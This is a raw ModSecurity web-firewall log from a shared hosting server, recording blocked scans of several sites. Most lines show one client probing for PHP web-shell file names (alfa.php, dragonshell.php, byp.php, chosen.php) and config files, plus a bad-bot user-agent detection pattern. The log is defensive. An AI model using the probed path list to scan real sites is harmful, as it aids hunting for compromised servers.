[Tue May 26 15:05:27.931564 2026] [security2:error] [pid 678998:tid 679215] [client 20.9.81.163:65084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/config.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrMgAAAFc"]
[Tue May 26 15:05:27.931760 2026] [security2:error] [pid 678998:tid 679215] [client 20.9.81.163:65084] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/config.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrMgAAAFc"]
[Tue May 26 15:05:28.079143 2026] [security2:error] [pid 678998:tid 679221] [client 20.9.81.163:17232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/item.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrMwAAAF0"]
[Tue May 26 15:05:28.079277 2026] [security2:error] [pid 678998:tid 679221] [client 20.9.81.163:17232] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/item.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrMwAAAF0"]
[Tue May 26 15:05:28.247645 2026] [security2:error] [pid 678998:tid 679204] [client 20.9.81.163:65059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/albin.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrNwAAAEw"]
[Tue May 26 15:05:28.247772 2026] [security2:error] [pid 678998:tid 679204] [client 20.9.81.163:65059] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/albin.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrNwAAAEw"]
[Tue May 26 15:05:28.251337 2026] [security2:error] [pid 678998:tid 679182] [client 14.180.23.134:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpX5-Rl4i_pgT-iAdrMQAAADY"]
[Tue May 26 15:05:28.371370 2026] [security2:error] [pid 678998:tid 679146] [client 20.9.81.163:26497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/alfa.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrPgAAABI"]
[Tue May 26 15:05:28.371488 2026] [security2:error] [pid 678998:tid 679146] [client 20.9.81.163:26497] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/alfa.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrPgAAABI"]
[Tue May 26 15:05:28.500290 2026] [security2:error] [pid 678998:tid 679130] [client 20.9.81.163:27811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/autoload_classmap.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrRgAAAAI"]
[Tue May 26 15:05:28.500402 2026] [security2:error] [pid 678998:tid 679130] [client 20.9.81.163:27811] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/autoload_classmap.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrRgAAAAI"]
[Tue May 26 15:05:28.649055 2026] [security2:error] [pid 678998:tid 679254] [client 20.9.81.163:59278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/av.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrTgAAAH4"]
[Tue May 26 15:05:28.649189 2026] [security2:error] [pid 678998:tid 679254] [client 20.9.81.163:59278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/av.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrTgAAAH4"]
[Tue May 26 15:05:28.776860 2026] [security2:error] [pid 678998:tid 679177] [client 20.9.81.163:17220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/dragonshell.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrVQAAADE"]
[Tue May 26 15:05:28.777017 2026] [security2:error] [pid 678998:tid 679177] [client 20.9.81.163:17220] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/dragonshell.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrVQAAADE"]
[Tue May 26 15:05:28.894097 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:55351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/f35.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrXQAAAHE"]
[Tue May 26 15:05:28.894229 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:55351] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/f35.php"] [unique_id "ahVpYJ-Rl4i_pgT-iAdrXQAAAHE"]
[Tue May 26 15:05:29.018198 2026] [security2:error] [pid 678998:tid 679197] [client 20.9.81.163:59287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/gg.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrZAAAAEU"]
[Tue May 26 15:05:29.018303 2026] [security2:error] [pid 678998:tid 679197] [client 20.9.81.163:59287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/gg.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrZAAAAEU"]
[Tue May 26 15:05:29.048919 2026] [security2:error] [pid 678998:tid 679020] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/settings.yml"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrZQAAYhU"]
[Tue May 26 15:05:29.136173 2026] [security2:error] [pid 678998:tid 679137] [client 20.9.81.163:26517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/gifclass.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdraQAAAAk"]
[Tue May 26 15:05:29.136260 2026] [security2:error] [pid 678998:tid 679137] [client 20.9.81.163:26517] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/gifclass.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdraQAAAAk"]
[Tue May 26 15:05:29.264918 2026] [security2:error] [pid 678998:tid 679129] [client 20.9.81.163:59322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/sql.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrbgAAAAE"]
[Tue May 26 15:05:29.265042 2026] [security2:error] [pid 678998:tid 679129] [client 20.9.81.163:59322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/sql.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrbgAAAAE"]
[Tue May 26 15:05:29.298063 2026] [security2:error] [pid 678998:tid 679165] [client 185.191.171.13:16782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrcAAAACU"]
[Tue May 26 15:05:29.298177 2026] [security2:error] [pid 678998:tid 679165] [client 185.191.171.13:16782] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrcAAAACU"]
[Tue May 26 15:05:29.346203 2026] [security2:error] [pid 678998:tid 679173] [client 147.53.122.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrbwAAAC0"], referer: https://www.anujtradingco.com/
[Tue May 26 15:05:29.397015 2026] [security2:error] [pid 678998:tid 679212] [client 20.9.81.163:17252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/up.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdregAAAFQ"]
[Tue May 26 15:05:29.397143 2026] [security2:error] [pid 678998:tid 679212] [client 20.9.81.163:17252] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/up.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdregAAAFQ"]
[Tue May 26 15:05:29.519396 2026] [security2:error] [pid 678998:tid 679131] [client 20.9.81.163:13624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrfAAAAAM"]
[Tue May 26 15:05:29.519513 2026] [security2:error] [pid 678998:tid 679131] [client 20.9.81.163:13624] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrfAAAAAM"]
[Tue May 26 15:05:29.645912 2026] [security2:error] [pid 678998:tid 679153] [client 20.9.81.163:47635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-admin/about.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrgwAAABk"]
[Tue May 26 15:05:29.646076 2026] [security2:error] [pid 678998:tid 679153] [client 20.9.81.163:47635] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-admin/about.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrgwAAABk"]
[Tue May 26 15:05:29.765292 2026] [security2:error] [pid 678998:tid 679211] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrcwAAAFM"]
[Tue May 26 15:05:29.771715 2026] [security2:error] [pid 678998:tid 679158] [client 20.9.81.163:48588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/function.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrhwAAAB4"]
[Tue May 26 15:05:29.771831 2026] [security2:error] [pid 678998:tid 679158] [client 20.9.81.163:48588] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/function.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdrhwAAAB4"]
[Tue May 26 15:05:29.889025 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:17216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/alfa.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdriAAAAHE"]
[Tue May 26 15:05:29.889200 2026] [security2:error] [pid 678998:tid 679241] [client 20.9.81.163:17216] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/alfa.php"] [unique_id "ahVpYZ-Rl4i_pgT-iAdriAAAAHE"]
[Tue May 26 15:05:30.005963 2026] [security2:error] [pid 678998:tid 679175] [client 20.9.81.163:65085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/admin.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrjAAAAC8"]
[Tue May 26 15:05:30.006050 2026] [security2:error] [pid 678998:tid 679175] [client 20.9.81.163:65085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/admin.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrjAAAAC8"]
[Tue May 26 15:05:30.134191 2026] [security2:error] [pid 678998:tid 679222] [client 20.9.81.163:55335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/66.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrkAAAAF4"]
[Tue May 26 15:05:30.134319 2026] [security2:error] [pid 678998:tid 679222] [client 20.9.81.163:55335] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/66.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrkAAAAF4"]
[Tue May 26 15:05:30.261288 2026] [security2:error] [pid 678998:tid 679255] [client 20.9.81.163:55307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/css.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrkQAAAH8"]
[Tue May 26 15:05:30.261372 2026] [security2:error] [pid 678998:tid 679255] [client 20.9.81.163:55307] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/css.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrkQAAAH8"]
[Tue May 26 15:05:30.412058 2026] [security2:error] [pid 678998:tid 679172] [client 20.9.81.163:59295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/init.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrmAAAACw"]
[Tue May 26 15:05:30.412193 2026] [security2:error] [pid 678998:tid 679172] [client 20.9.81.163:59295] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/init.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrmAAAACw"]
[Tue May 26 15:05:30.537517 2026] [security2:error] [pid 678998:tid 679139] [client 20.9.81.163:13612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/byp.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrnQAAAAs"]
[Tue May 26 15:05:30.537657 2026] [security2:error] [pid 678998:tid 679139] [client 20.9.81.163:13612] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/byp.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrnQAAAAs"]
[Tue May 26 15:05:30.656877 2026] [security2:error] [pid 678998:tid 679181] [client 147.53.122.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdroAAAADU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1230906&moderation-hash=ba033614e47bbe413fcd130609457956
[Tue May 26 15:05:30.688232 2026] [security2:error] [pid 678998:tid 679130] [client 20.9.81.163:26499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrpQAAAAI"]
[Tue May 26 15:05:30.688338 2026] [security2:error] [pid 678998:tid 679130] [client 20.9.81.163:26499] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrpQAAAAI"]
[Tue May 26 15:05:30.806830 2026] [security2:error] [pid 678998:tid 679149] [client 20.9.81.163:57911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/index/chosen.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrqQAAABU"]
[Tue May 26 15:05:30.806938 2026] [security2:error] [pid 678998:tid 679149] [client 20.9.81.163:57911] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/index/chosen.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrqQAAABU"]
[Tue May 26 15:05:30.886869 2026] [security2:error] [pid 678998:tid 679073] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/appsettings.json"] [unique_id "ahVpYp-Rl4i_pgT-iAdrqgAACko"]
[Tue May 26 15:05:30.932656 2026] [security2:error] [pid 678998:tid 679144] [client 20.9.81.163:47663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/about/chosen.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrqwAAABA"]
[Tue May 26 15:05:30.932758 2026] [security2:error] [pid 678998:tid 679144] [client 20.9.81.163:47663] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/about/chosen.php"] [unique_id "ahVpYp-Rl4i_pgT-iAdrqwAAABA"]
[Tue May 26 15:05:31.073871 2026] [security2:error] [pid 678998:tid 679204] [client 20.9.81.163:8935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/as/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdrsQAAAEw"]
[Tue May 26 15:05:31.073982 2026] [security2:error] [pid 678998:tid 679204] [client 20.9.81.163:8935] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/as/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdrsQAAAEw"]
[Tue May 26 15:05:31.203481 2026] [security2:error] [pid 678998:tid 679211] [client 20.9.81.163:27792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/file/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdrtwAAAFM"]
[Tue May 26 15:05:31.203595 2026] [security2:error] [pid 678998:tid 679211] [client 20.9.81.163:27792] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/file/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdrtwAAAFM"]
[Tue May 26 15:05:31.363422 2026] [security2:error] [pid 678998:tid 679215] [client 20.9.81.163:27808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/chosen/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdruwAAAFc"]
[Tue May 26 15:05:31.363534 2026] [security2:error] [pid 678998:tid 679215] [client 20.9.81.163:27808] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/chosen/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdruwAAAFc"]
[Tue May 26 15:05:31.502760 2026] [security2:error] [pid 678998:tid 679183] [client 20.9.81.163:47641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/css/chosen.php"] [unique_id "ahVpY5-Rl4i_pgT-iAdrywAAADc"]
